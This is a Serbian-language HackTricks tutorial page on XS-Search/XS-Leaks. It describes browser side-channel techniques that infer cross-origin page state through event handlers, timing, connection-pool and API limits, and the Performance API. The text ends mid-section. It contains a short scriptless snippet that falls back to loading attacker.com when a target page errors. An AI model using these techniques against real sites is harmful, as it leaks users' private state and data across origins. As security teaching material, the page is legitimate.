# XS-Pretraga/XS-Procuri

<figure><img src="../.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>

Koristite [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) da lako izgradite i **automatizujete radne tokove** pokretane najnaprednijim alatima zajednice.\
Pristupite danas:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

<details>

<summary><strong>Naučite hakovanje AWS-a od nule do heroja sa</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Drugi načini podrške HackTricks-u:

* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** Proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Podelite svoje hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.

</details>

## Osnovne Informacije

XS-Pretraga je metoda korišćena za **izvlačenje informacija preko granica porekla** iskorišćavanjem **ranjivosti bočnog kanala**.

Ključni komponenti uključeni u ovaj napad su:

* **Ranjiva Veb Stranica**: Ciljna veb stranica sa koje se namerava izvući informacija.
* **Veb Napadača**: Zlonamerna veb stranica kreirana od strane napadača, koju žrtva posećuje, na kojoj se nalazi eksploatacija.
* **Metod Uključivanja**: Tehnika koja se koristi za uključivanje Ranjive Veb Stranice u Veb Napadača (npr. window.open, iframe, fetch, HTML oznaka sa href, itd.).
* **Tehnika Procurenja**: Tehnike korišćene za razlikovanje razlika u stanju Ranjive Veb Stranice na osnovu informacija prikupljenih putem metoda uključivanja.
* **Stanja**: Dva potencijalna stanja Ranjive Veb Stranice, koja napadač pokušava razlikovati.
* **Detektovive Razlike**: Opservabilne varijacije na koje se napadač oslanja da bi zaključio stanje Ranjive Veb Stranice.

### Detektovive Razlike

Neke aspekte mogu se analizirati radi razlikovanja stanja Ranjive Veb Stranice:

* **Statusni Kod**: Razlikovanje između **različitih HTTP odgovora statusnih kodova** preko granica porekla, kao što su serverske greške, klijentske greške ili autentikacione greške.
* **Korišćenje API-ja**: Identifikacija **korišćenja Web API-ja** preko stranica, otkrivajući da li preko granica porekla stranica koristi određeni JavaScript Web API.
* **Preusmeravanja**: Detektovanje navigacija ka različitim stranicama, ne samo HTTP preusmeravanja već i onih pokrenutih JavaScript-om ili HTML-om.
* **Sadržaj Stranice**: Opservacija **varijacija u telu HTTP odgovora** ili u pod-resursima stranice, kao što su **broj ugrađenih okvira** ili dispariteti u veličini slika.
* **HTTP Zaglavlje**: Primećivanje prisustva ili možda vrednosti **specifičnog HTTP odgovora zaglavlja**, uključujući zaglavlja poput X-Frame-Options, Content-Disposition, i Cross-Origin-Resource-Policy.
* **Vreme**: Primećivanje konzistentnih vremenskih dispariteta između dva stanja.

### Metodi Uključivanja

* **HTML Elementi**: HTML nudi različite elemente za **uključivanje resursa preko granica porekla**, poput stilova, slika ili skripti, prisiljavajući pregledač da zatraži ne-HTML resurs. Kompilacija potencijalnih HTML elemenata u tu svrhu može se pronaći na [https://github.com/cure53/HTTPLeaks](https://github.com/cure53/HTTPLeaks).
* **Okviri**: Elementi poput **iframe**, **object**, i **embed** mogu ugraditi HTML resurse direktno na stranicu napadača. Ako stranica **nema zaštitu okvira**, JavaScript može pristupiti window objektu ugrađenog resursa putem contentWindow svojstva.
* **Iskačući Prozori**: Metoda **`window.open`** otvara resurs u novom tabu ili prozoru, pružajući **ručku prozora** za JavaScript da interaguje sa metodama i svojstvima prateći SOP. Iskačući prozori, često korišćeni u jednokratnoj prijavi, zaobilaze ograničenja okvira i kolačića ciljnog resursa. Međutim, moderni pregledači ograničavaju kreiranje iskačućih prozora na određene korisničke akcije.
* **JavaScript Zahtevi**: JavaScript dozvoljava direktno zahteve ka ciljnim resursima korišćenjem **XMLHttpRequests** ili **Fetch API-ja**. Ove metode nude preciznu kontrolu nad zahtevom, kao što je opcija praćenja HTTP preusmeravanja.

### Tehnike Procurenja

* **Rukovalac Događajima**: Klasika tehnika procurenja u XS-Procurama, gde rukovaoci događajima poput **onload** i **onerror** pružaju uvide o uspehu ili neuspehu učitavanja resursa.
* **Poruke o Greškama**: JavaScript izuzeci ili posebne stranice grešaka mogu pružiti informacije o procurivanju ili razlikovanju između prisustva i odsustva greške.
* **Globalna Ograničenja**: Fizička ograničenja pregledača, poput kapaciteta memorije ili drugih nametnutih ograničenja pregledača, mogu signalizirati kada je dostignut prag, služeći kao tehnika procurivanja.
* **Globalno Stanje**: Detektovive interakcije sa **globalnim stanjima pregledača** (npr. History interfejs) mogu biti iskorišćene. Na primer, **broj unosa** u istoriju pregledača može pružiti tragove o stranicama preko granica porekla.
* **Performance API**: Ovaj API pruža **detalje o performansama trenutne stranice**, uključujući mrežno vreme za dokument i učitane resurse, omogućavajući zaključke o traženim resursima.
* **Čitljivi Atributi**: Neki HTML atributi su **čitljivi preko granica porekla** i mogu se koristiti kao tehnika procurivanja. Na primer, svojstvo `window.frame.length` omogućava JavaScript-u da prebroji okvire uključene na stranici preko granica porekla.

## XSinator Alat & Rad

XSinator je automatski alat za **proveru pregledača protiv nekoliko poznatih XS-Procura** objašnjenih u njegovom radu: [**https://xsinator.com/paper.pdf**](https://xsinator.com/paper.pdf)

Možete **pristupiti alatu na** [**https://xsinator.com/**](https://xsinator.com/)

{% hint style="warning" %}
**Isključeni XS-Procuri**: Morali smo isključiti XS-Procuri koji se oslanjaju na **servisne radnike** jer bi ometali druge procure u XSinatoru. Takođe, odlučili smo da **isključimo XS-Procuri koji se oslanjaju na loše konfiguracije i greške u određenoj veb aplikaciji**. Na primer, CrossOrigin Resource Sharing (CORS) loše konfiguracije, postMessage procurivanje ili Cross-Site Scripting. Dodatno, isključili smo vremenski zasnovane XS-Procuri jer često imaju problema sa sporim, bučnim i netačnim rezultatima.
{% endhint %}

<figure><img src="../.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>

\
Koristite [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) da lako izgradite i **automatizujete radne tokove** pokretane najnaprednijim alatima zajednice.\
Pristupite danas:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
## **Tehnike zasnovane na vremenu**

Neke od sledećih tehnika koristiće vreme kao deo procesa za otkrivanje razlika u mogućim stanjima web stranica. Postoje različiti načini merenja vremena u web pregledaču.

**Satovi**: API [performance.now()](https://developer.mozilla.org/en-US/docs/Web/API/Performance/now) omogućava programerima da dobiju merenja visoke rezolucije vremena.\
Postoji značajan broj API-ja koje napadači mogu zloupotrebiti kako bi kreirali implicitne satove: [Broadcast Channel API](https://developer.mozilla.org/en-US/docs/Web/API/Broadcast_Channel_API), [Message Channel API](https://developer.mozilla.org/en-US/docs/Web/API/MessageChannel), [requestAnimationFrame](https://developer.mozilla.org/en-US/docs/Web/API/window/requestAnimationFrame), [setTimeout](https://developer.mozilla.org/en-US/docs/Web/API/WindowOrWorkerGlobalScope/setTimeout), CSS animacije i drugi.\
Za više informacija: [https://xsleaks.dev/docs/attacks/timing-attacks/clocks](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/).

## Tehnike rukovaoca događajima

### Onload/Onerror

* **Metodi uključivanja**: Okviri, HTML elementi
* **Detektovana razlika**: Kod statusa
* **Više informacija**: [https://www.usenix.org/conference/usenixsecurity19/presentation/staicu](https://www.usenix.org/conference/usenixsecurity19/presentation/staicu), [https://xsleaks.dev/docs/attacks/error-events/](https://xsleaks.dev/docs/attacks/error-events/)
* **Rezime**: ako se pokuša učitavanje resursa i događaji onerror/onload se pokrenu kada se resurs uspešno/neuspešno učita, moguće je saznati kod statusa.
* **Primer koda**: [https://xsinator.com/testing.html#Event%20Handler%20Leak%20(Script)](https://xsinator.com/testing.html#Event%20Handler%20Leak%20\(Script\))

{% content-ref url="xs-search/cookie-bomb-+-onerror-xs-leak.md" %}
[cookie-bomb-+-onerror-xs-leak.md](xs-search/cookie-bomb-+-onerror-xs-leak.md)
{% endcontent-ref %}

Primer koda pokušava da **učita objekte skriptova iz JS-a**, ali se **drugi tagovi** poput objekata, stilova, slika, zvukova takođe mogu koristiti. Takođe, moguće je direktno ubaciti **tag** i deklarisati događaje `onload` i `onerror` unutar taga (umesto da se ubacuje iz JS-a).

Postoji i verzija ovog napada bez skripti:
```html
<object data="//example.com/404">
<object data="//attacker.com/?error"></object>
</object>
```
U ovom slučaju, ako se `example.com/404` ne pronađe, učitaće se `attacker.com/?error`.

### Vreme učitavanja

* **Metode uključivanja**: HTML elementi
* **Detektibilna razlika**: Vreme (obično zbog sadržaja stranice, statusnog koda)
* **Više informacija**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#onload-events](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#onload-events)
* **Rezime:** [**performance.now()**](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/#performancenow) **API** se može koristiti za merenje vremena potrebnog za izvršavanje zahteva. Međutim, mogu se koristiti i drugi časovnici, poput [**PerformanceLongTaskTiming API**](https://developer.mozilla.org/en-US/docs/Web/API/PerformanceLongTaskTiming) koji može identifikovati zadatke koji se izvršavaju duže od 50ms.
* **Primer koda**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#onload-events](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#onload-events) još jedan primer u:

{% content-ref url="xs-search/performance.now-example.md" %}
[performance.now-example.md](xs-search/performance.now-example.md)
{% endcontent-ref %}

#### Vreme učitavanja + Prisilni težak zadatak

Ova tehnika je slična prethodnoj, ali će **napadač** takođe **prisiliti** neku akciju da traje **relevantno dugo vreme** kada je **odgovor pozitivan ili negativan** i meriti to vreme.

{% content-ref url="xs-search/performance.now-+-force-heavy-task.md" %}
[performance.now-+-force-heavy-task.md](xs-search/performance.now-+-force-heavy-task.md)
{% endcontent-ref %}

### Vreme istovara/pre istovara

* **Metode uključivanja**: Frejmovi
* **Detektibilna razlika**: Vreme (obično zbog sadržaja stranice, statusnog koda)
* **Više informacija**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#unload-events](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#unload-events)
* **Rezime:** [SharedArrayBuffer časovnik](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/#sharedarraybuffer-and-web-workers) se može koristiti za merenje vremena potrebnog za izvršavanje zahteva. Mogu se koristiti i drugi časovnici.
* **Primer koda**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#unload-events](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#unload-events)

Vreme potrebno za preuzimanje resursa može se meriti korišćenjem događaja [`unload`](https://developer.mozilla.org/en-US/docs/Web/API/Window/unload\_event) i [`beforeunload`](https://developer.mozilla.org/en-US/docs/Web/API/Window/beforeunload\_event). Događaj **`beforeunload`** se pokreće kada se pregledač sprema da pređe na novu stranicu, dok se događaj **`unload`** dešava kada se navigacija zapravo odvija. Razlika u vremenu između ova dva događaja može se izračunati kako bi se odredilo **koliko je vremena pregledač proveo preuzimajući resurs**.

### Vreme frejma sa peskom + učitavanje <a href="#sandboxed-frame-timing-attacks" id="sandboxed-frame-timing-attacks"></a>

* **Metode uključivanja**: Frejmovi
* **Detektibilna razlika**: Vreme (obično zbog sadržaja stranice, statusnog koda)
* **Više informacija**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#sandboxed-frame-timing-attacks](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#sandboxed-frame-timing-attacks)
* **Rezime:** [performance.now()](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/#performancenow) API se može koristiti za merenje vremena potrebnog za izvršavanje zahteva. Mogu se koristiti i drugi časovnici.
* **Primer koda**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#sandboxed-frame-timing-attacks](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#sandboxed-frame-timing-attacks)

Primećeno je da u odsustvu [Zaštitnih okvira](https://xsleaks.dev/docs/defenses/opt-in/xfo/), vreme potrebno za učitavanje stranice i njenih podresursa preko mreže može biti mereno od strane napadača. Ovo merenje je obično moguće jer se `onload` rukovalac iframe-a pokreće tek nakon završetka učitavanja resursa i izvršavanja JavaScript-a. Da bi zaobišli varijabilnost koju uvodi izvršavanje skripti, napadač može koristiti atribut [`sandbox`](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe) unutar `<iframe>`. Uključivanje ovog atributa ograničava brojne funkcionalnosti, posebno izvršavanje JavaScript-a, čime se olakšava merenje koje je pretežno uticano performansama mreže.
```javascript
// Example of an iframe with the sandbox attribute
<iframe src="example.html" sandbox></iframe>
```
### #ID + greška + onload

* **Metode uključivanja**: Okviri
* **Detektovana razlika**: Sadržaj stranice
* **Više informacija**:
* **Sažetak**: Ako možete da izazovete grešku na stranici kada se pristupi ispravnom sadržaju i da je pravilno učitate kada se pristupi bilo kom sadržaju, tada možete napraviti petlju za izvlačenje svih informacija bez merenja vremena.
* **Primer koda**:

Pretpostavimo da možete **ubaciti** **stranicu** koja ima **tajni** sadržaj **unutar Iframe-a**.

Možete **naterati žrtvu da traži** datoteku koja sadrži "_**flag**_" koristeći **Iframe** (na primer, iskorišćavajući CSRF). Unutar Iframe-a znate da će se _**onload događaj**_ **uvek izvršiti barem jednom**. Zatim možete **promeniti** **URL** Iframe-a, ali menjajući samo **sadržaj** **hash-a** unutar URL-a.

Na primer:

1. **URL1**: www.napadac.com/xssearch#probaj1
2. **URL2**: www.napadac.com/xssearch#probaj2

Ako je prvi URL **uspešno učitan**, tada, kada se **promeni** **hash** dela URL-a, **onload** događaj **neće biti ponovo pokrenut**. Ali **ako** je stranica imala neku vrstu **greške** prilikom **učitavanja**, tada će se **onload** događaj ponovo **pokrenuti**.

Tako možete **razlikovati** između **ispravno** učitane stranice ili stranice koja ima **grešku** prilikom pristupa.

### Izvršenje JavaScript-a

* **Metode uključivanja**: Okviri
* **Detektovana razlika**: Sadržaj stranice
* **Više informacija**:
* **Sažetak**: Ako **stranica** vraća **osetljiv** sadržaj, **ili** sadržaj koji može biti **kontrolisan** od strane korisnika. Korisnik može postaviti **validan JS kod u negativnom slučaju**, i **učitati** svaki pokušaj unutar **`<script>`** oznaka, tako da u **negativnim** slučajevima napadačev **kod** se **izvršava**, a u **afirmativnim** slučajevima **ništa** se neće izvršiti.
* **Primer koda**:

{% content-ref url="xs-search/javascript-execution-xs-leak.md" %}
[javascript-execution-xs-leak.md](xs-search/javascript-execution-xs-leak.md)
{% endcontent-ref %}

### CORB - Onerror

* **Metode uključivanja**: HTML elementi
* **Detektovana razlika**: Statusni kod i zaglavlja
* **Više informacija**: [https://xsleaks.dev/docs/attacks/browser-features/corb/](https://xsleaks.dev/docs/attacks/browser-features/corb/)
* **Sažetak**: **Cross-Origin Read Blocking (CORB)** je sigurnosna mera koja sprečava učitavanje određenih osetljivih resursa sa različitih izvora kako bi se zaštitili od napada poput **Spectre**. Međutim, napadači mogu iskoristiti njegovo zaštitno ponašanje. Kada odgovor podložan **CORB**-u vrati _**CORB zaštićeni**_ `Content-Type` sa `nosniff` i `2xx` statusnim kodom, **CORB** uklanja telo i zaglavlja odgovora. Napadači koji to posmatraju mogu zaključiti kombinaciju **statusnog koda** (ukazujući na uspeh ili grešku) i `Content-Type` (označavajući da li je zaštićen **CORB**-om), što može dovesti do potencijalnog otkrivanja informacija.
* **Primer koda**:

Proverite link za više informacija o napadu.

### onblur

* **Metode uključivanja**: Okviri
* **Detektovana razlika**: Sadržaj stranice
* **Više informacija**: [https://xsleaks.dev/docs/attacks/id-attribute/](https://xsleaks.dev/docs/attacks/id-attribute/), [https://xsleaks.dev/docs/attacks/experiments/portals/](https://xsleaks.dev/docs/attacks/experiments/portals/)
* **Sažetak**: Procure osetljivi podaci iz id ili name atributa.
* **Primer koda**: [https://xsleaks.dev/docs/attacks/id-attribute/#code-snippet](https://xsleaks.dev/docs/attacks/id-attribute/#code-snippet)

Moguće je **učitati stranicu** unutar **iframe-a** i koristiti **`#id_vrednost`** da bi se stranica **fokusirala na element** iframe-a sa naznačenim id-om, zatim ako je pokrenut **`onblur`** signal, ID element postoji.\
Možete izvesti isti napad sa **`portal`** oznakama.

### postMessage Emitovanja <a href="#postmessage-broadcasts" id="postmessage-broadcasts"></a>

* **Metode uključivanja**: Okviri, Iskačući prozori
* **Detektovana razlika**: Korišćenje API-ja
* **Više informacija**: [https://xsleaks.dev/docs/attacks/postmessage-broadcasts/](https://xsleaks.dev/docs/attacks/postmessage-broadcasts/)
* **Sažetak**: Prikupljanje osetljivih informacija putem postMessage ili korišćenje prisustva postMessages kao orakla da bi se znalo stanje korisnika na stranici
* **Primer koda**: `Bilo koji kod koji osluškuje sve postMessages.`

Aplikacije često koriste [`postMessage` emitovanja](https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage) za komunikaciju između različitih izvora. Međutim, ovaj metod može nenamerno otkriti **osetljive informacije** ako parametar `targetOrigin` nije pravilno naveden, omogućavajući bilo kojem prozoru da primi poruke. Osim toga, samo primanje poruke može delovati kao **orakl**; na primer, određene poruke mogu biti poslate samo korisnicima koji su prijavljeni. Stoga, prisustvo ili odsustvo ovih poruka može otkriti informacije o stanju ili identitetu korisnika, kao što je da li su autentifikovani ili ne.

<figure><img src="../.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>

Koristite [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) da lako izgradite i **automatizujete tokove rada** pomoću najnaprednijih alata zajednice na svetu.\
Pristupite danas:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

## Globalne Tehnike Ograničenja

### WebSocket API

* **Metode uključivanja**: Okviri, Iskačući prozori
* **Detektovana razlika**: Korišćenje API-ja
* **Više informacija**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.1)
* **Sažetak**: Iscrpljivanje limita WebSocket veze otkriva broj WebSocket veza stranice sa različitog izvora.
* **Primer koda**: [https://xsinator.com/testing.html#WebSocket%20Leak%20(FF)](https://xsinator.com/testing.html#WebSocket%20Leak%20\(FF\)), [https://xsinator.com/testing.html#WebSocket%20Leak%20(GC)](https://xsinator.com/testing.html#WebSocket%20Leak%20\(GC\))

Moguće je identifikovati da li, i koliko, **WebSocket veza ciljna stranica koristi**. To omogućava napadaču da otkrije stanja aplikacije i procure informacije vezane za broj WebSocket veza.

Ako jedan **izvor** koristi **maksimalan broj WebSocket** objekata veze, bez obzira na njihovo stanje veze, kreiranje **novih objekata rezultiraće JavaScript izuzecima**. Da bi izveo ovaj napad, napadačka veb lokacija otvara ciljnu veb lokaciju u iskačućem prozoru ili iframe-u, a zatim, nakon što je ciljna veb stranica učitana, pokušava da kreira maksimalan broj mogućih WebSocket veza. **Broj bačenih izuzetaka** je **broj WebSocket veza koje koristi ciljna veb lokacija** prozora.
### Payment API

* **Metode uključivanja**: Okviri, Iskačući prozori
* **Detektibilna razlika**: Korišćenje API-ja
* **Više informacija**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.1)
* **Sažetak**: Detektujte zahtev za plaćanje jer može biti aktivan samo jedan u isto vreme.
* **Primer koda**: [https://xsinator.com/testing.html#Payment%20API%20Leak](https://xsinator.com/testing.html#Payment%20API%20Leak)

Ova XS-Leak omogućava napadaču da **detektuje kada prekogranična stranica pokrene zahtev za plaćanje**.

Pošto **može biti aktivan samo jedan zahtev za plaćanje** u isto vreme, ako ciljana veb lokacija koristi Payment Request API, svaki **dalji pokušaj korišćenja ovog API-ja će propasti**, i izazvati **JavaScript izuzetak**. Napadač može iskoristiti ovo tako što će **periodično pokušavati da prikaže Payment API UI**. Ako jedan pokušaj izazove izuzetak, ciljana veb lokacija trenutno ga koristi. Napadač može sakriti ove periodične pokušaje tako što će odmah zatvoriti UI nakon kreiranja.

### Merenje petlje događaja <a href="#timing-the-event-loop" id="timing-the-event-loop"></a>

* **Metode uključivanja**:
* **Detektibilna razlika**: Vreme (uglavnom zbog Sadržaja stranice, Statusnog koda)
* **Više informacija**: [https://xsleaks.dev/docs/attacks/timing-attacks/execution-timing/#timing-the-event-loop](https://xsleaks.dev/docs/attacks/timing-attacks/execution-timing/#timing-the-event-loop)
* **Sažetak**: Merenje vremena izvršavanja veba zloupotrebom jednonitne JS petlje događaja.
* **Primer koda**:

{% content-ref url="xs-search/event-loop-blocking-+-lazy-images.md" %}
[event-loop-blocking-+-lazy-images.md](xs-search/event-loop-blocking-+-lazy-images.md)
{% endcontent-ref %}

JavaScript funkcioniše na [jednonitnoj petlji događaja](https://developer.mozilla.org/en-US/docs/Web/JavaScript/EventLoop) modelu konkurentnosti, što znači da **može izvršavati samo jedan zadatak u isto vreme**. Ova karakteristika može biti iskorišćena da se utvrdi **koliko vremena kod sa različitog porekla zahteva za izvršavanje**. Napadač može meriti vreme izvršavanja svog koda u petlji događaja kontinuiranim slanjem događaja sa fiksnim svojstvima. Ovi događaji će biti obrađeni kada je bazen događaja prazan. Ako i druga porekla takođe šalju događaje u isti bazen, **napadač može zaključiti vreme potrebno za izvršavanje tih spoljnih događaja posmatrajući kašnjenja u izvršavanju svojih zadataka**. Ovaj metod praćenja petlje događaja za kašnjenja može otkriti vreme izvršavanja koda sa različitih porekla, potencijalno otkrivajući osetljive informacije.

{% hint style="warning" %}
Prilikom merenja vremena izvršavanja moguće je **eliminisati** **mrežne faktore** kako bi se dobile **preciznije merenja**. Na primer, učitavanjem resursa korišćenih od strane stranice pre njenog učitavanja.
{% endhint %}

### Zauzeta petlja događaja <a href="#busy-event-loop" id="busy-event-loop"></a>

* **Metode uključivanja**:
* **Detektibilna razlika**: Vreme (uglavnom zbog Sadržaja stranice, Statusnog koda)
* **Više informacija**: [https://xsleaks.dev/docs/attacks/timing-attacks/execution-timing/#busy-event-loop](https://xsleaks.dev/docs/attacks/timing-attacks/execution-timing/#busy-event-loop)
* **Sažetak**: Jedan metod za merenje vremena izvršavanja veb operacije uključuje namerno blokiranje petlje događaja niti, a zatim merenje **koliko vremena je potrebno da petlja događaja ponovo postane dostupna**. Ubacivanjem blokirajuće operacije (kao što je dugotrajno računanje ili sinhroni API poziv) u petlju događaja, i praćenjem vremena potrebnog za početak izvršavanja sledećeg koda, može se zaključiti trajanje zadataka koji su se izvršavali u petlji događaja tokom blokiranog perioda. Ova tehnika koristi jednonitnu prirodu JavaScript-ove petlje događaja, gde se zadaci izvršavaju sekvencijalno, i može pružiti uvid u performanse ili ponašanje drugih operacija koje dele istu nit.

* **Primer koda**:

Značajna prednost tehnike merenja vremena izvršavanja blokiranjem petlje događaja je njena sposobnost da zaobiđe **Izolaciju sajta**. **Izolacija sajta** je bezbednosna funkcija koja razdvaja različite veb lokacije u odvojene procese, sa ciljem da spreči zlonamerne sajtove da direktno pristupe osetljivim podacima drugih sajtova. Međutim, uticajem na vreme izvršavanja druge lokacije kroz deljenu petlju događaja, napadač može indirektno izvući informacije o aktivnostima te lokacije. Ova metoda ne oslanja se na direktni pristup podacima druge lokacije, već posmatra uticaj aktivnosti te lokacije na deljenu petlju događaja, čime izbegava zaštitne barijere uspostavljene od strane **Izolacije sajta**.

{% hint style="warning" %}
Prilikom merenja vremena izvršavanja moguće je **eliminisati** **mrežne faktore** kako bi se dobile **preciznije merenja**. Na primer, učitavanjem resursa korišćenih od strane stranice pre njenog učitavanja.
{% endhint %}

### Pool konekcija

* **Metode uključivanja**: JavaScript zahtevi
* **Detektibilna razlika**: Vreme (uglavnom zbog Sadržaja stranice, Statusnog koda)
* **Više informacija**: [https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/](https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/)
* **Sažetak**: Napadač može blokirati sve priključke osim jednog, učitati ciljnu veb stranicu i istovremeno učitati drugu stranicu, vreme dok se poslednja stranica počne učitavati je vreme koje je ciljna stranica uzela za učitavanje.
* **Primer koda**:

{% content-ref url="xs-search/connection-pool-example.md" %}
[connection-pool-example.md](xs-search/connection-pool-example.md)
{% endcontent-ref %}

Pregledači koriste priključke za komunikaciju sa serverom, ali zbog ograničenih resursa operativnog sistema i hardvera, **pregledači su primorani da nametnu ograničenje** na broj istovremenih priključaka. Napadači mogu iskoristiti ovo ograničenje kroz sledeće korake:

1. Utvrditi ograničenje priključaka pregledača, na primer, 256 globalnih priključaka.
2. Zauzeti 255 priključaka tokom produženog perioda pokretanjem 255 zahteva ka različitim hostovima, dizajniranih da održe otvorene veze bez završetka.
3. Koristiti 256. priključak za slanje zahteva ka ciljnoj stranici.
4. Pokušati 257. zahtev ka drugom hostu. S obzirom da su svi priključci zauzeti (kako je navedeno u koracima 2 i 3), ovaj zahtev će biti stavljen u red čekanja dok priključak ne postane dostupan. Kašnjenje pre nego što ovaj zahtev nastavi pruža napadaču informacije o vremenu vezanom za mrežnu aktivnost povezanu sa 256. priključkom (priključkom ciljne stranice). Ova zaključivanja su moguća jer su 255 priključaka iz koraka 2 i dalje zauzeti, što implicira da svaki novi dostupan priključak mora biti onaj oslobođen iz koraka 3. Vreme potrebno da 256. priključak postane dostupan direktno je povezano sa vremenom potrebnim za završetak zahteva ka ciljnoj stranici.

Za više informacija: [https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/](https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/)
## Tehnike API-ja za Performanse

[`Performance API`](https://developer.mozilla.org/en-US/docs/Web/API/Performance) pruža uvide u metrike performansi veb aplikacija, dodatno obogaćene [`Resource Timing API`](https://developer.mozilla.org/en-US/docs/Web/API/Resource\_Timing\_API). Resource Timing API omogućava praćenje detaljnih vremena mrežnih zahteva, poput trajanja zahteva. Važno je napomenuti da kada serveri uključe zaglavlje `Timing-Allow-Origin: *` u svojim odgovorima, dodatni podaci poput veličine prenosa i vremena pretrage domena postaju dostupni.

Ova obilje podataka može se dobiti putem metoda poput [`performance.getEntries`](https://developer.mozilla.org/en-US/docs/Web/API/Performance/getEntries) ili [`performance.getEntriesByName`](https://developer.mozilla.org/en-US/docs/Web/API/Performance/getEntriesByName), pružajući sveobuhvatan pregled informacija povezanih s performansama. Dodatno, API olakšava merenje vremena izvršavanja računanjem razlike između vremenskih oznaka dobijenih iz [`performance.now()`](https://developer.mozilla.org/en-US/docs/Web/API/Performance/now). Međutim, važno je napomenuti da za određene operacije u pregledačima poput Chrome-a, preciznost `performance.now()` može biti ograničena na milisekunde, što može uticati na granularnost merenja vremena.

Osim merenja vremena, Performance API se može iskoristiti za uvide povezane sa sigurnošću. Na primer, prisustvo ili odsustvo stranica u objektu `performance` u Chrome-u može ukazivati na primenu `X-Frame-Options`. Konkretno, ako je stranica blokirana od prikazivanja u okviru zbog `X-Frame-Options`, neće biti zabeležena u objektu `performance`, pružajući suptilan trag o politikama uokvirivanja stranice.

### Curenje Greške

* **Metode Uključivanja**: Okviri, HTML Elementi
* **Detektoviva Razlika**: Kod Statusa
* **Više informacija**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2)
* **Rezime:** Zahtevi koji rezultiraju greškama neće kreirati unos vremena resursa.
* **Primer Koda**: [https://xsinator.com/testing.html#Performance%20API%20Error%20Leak](https://xsinator.com/testing.html#Performance%20API%20Error%20Leak)

Moguće je **razlikovati između kodova statusa HTTP odgovora** jer zahtevi koji dovode do **greške** ne stvaraju **unos performansi**.

### Greška Ponovnog Učitavanja Stila

* **Metode Uključivanja**: HTML Elementi
* **Detektoviva Razlika**: Kod Statusa
* **Više informacija**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2)
* **Rezime:** Zbog greške u pregledaču, zahtevi koji rezultiraju greškama se učitavaju dva puta.
* **Primer Koda**: [https://xsinator.com/testing.html#Style%20Reload%20Error%20Leak](https://xsinator.com/testing.html#Style%20Reload%20Error%20Leak)

U prethodnoj tehnici takođe su identifikovana dva slučaja gde greške u pregledaču u GC dovode do **ponovnog učitavanja resursa kada ne uspeju da se učitaju**. To će rezultirati višestrukim unosima u Performance API-ju i može se detektovati.

### Greška Spajanja Zahteva

* **Metode Uključivanja**: HTML Elementi
* **Detektoviva Razlika**: Kod Statusa
* **Više informacija**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2)
* **Rezime:** Zahtevi koji rezultiraju greškom ne mogu biti spojeni.
* **Primer Koda**: [https://xsinator.com/testing.html#Request%20Merging%20Error%20Leak](https://xsinator.com/testing.html#Request%20Merging%20Error%20Leak)

Tehnika je pronađena u tabeli u pomenutom radu, ali nije pronađen opis tehnike. Međutim, možete pronaći izvorni kod koji proverava to na [https://xsinator.com/testing.html#Request%20Merging%20Error%20Leak](https://xsinator.com/testing.html#Request%20Merging%20Error%20Leak)

### Curenje Prazne Stranice

* **Metode Uključivanja**: Okviri
* **Detektoviva Razlika**: Sadržaj Stranice
